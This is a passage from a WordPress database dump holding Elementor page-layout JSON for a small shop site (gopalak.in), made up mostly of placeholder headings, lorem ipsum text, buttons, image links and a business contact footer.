Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8431,1478,'_elementor_page_assets','a:0:{}'),(8433,1479,'_elementor_edit_mode','builder'),(8434,1479,'_elementor_template_type','wp-page'),(8435,1479,'_elementor_version','3.7.7'),(8436,1479,'_wp_page_template','elementor_canvas'),(8437,1479,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ce1c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#C3C3C321\"},\"elements\":[{\"id\":\"6cb9f56\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":0},\"elements\":[{\"id\":\"d4fc894\",\"elType\":\"widget\",\"settings\":{\"view\":\"\",\"icon_list\":[{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"99391c3\"},{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"de33d81\"},{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"4bd4895\"},{\"text\":\"List Item #2\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"6156b25\"},{\"text\":\"List Item #3\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"59990f4\"}],\"icon_align\":\"center\",\"divider\":\"yes\",\"divider_style\":\"dotted\",\"divider_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"32\",\"bottom\":\"32\",\"left\":\"32\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"0e3e07c\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"c2e40a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8438,1479,'_elementor_page_assets','a:0:{}'),(8441,1480,'_elementor_edit_mode','builder'),(8442,1480,'_elementor_template_type','wp-page'),(8443,1480,'_elementor_version','3.7.7'),(8444,1480,'_wp_page_template','elementor_canvas'),(8445,1480,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 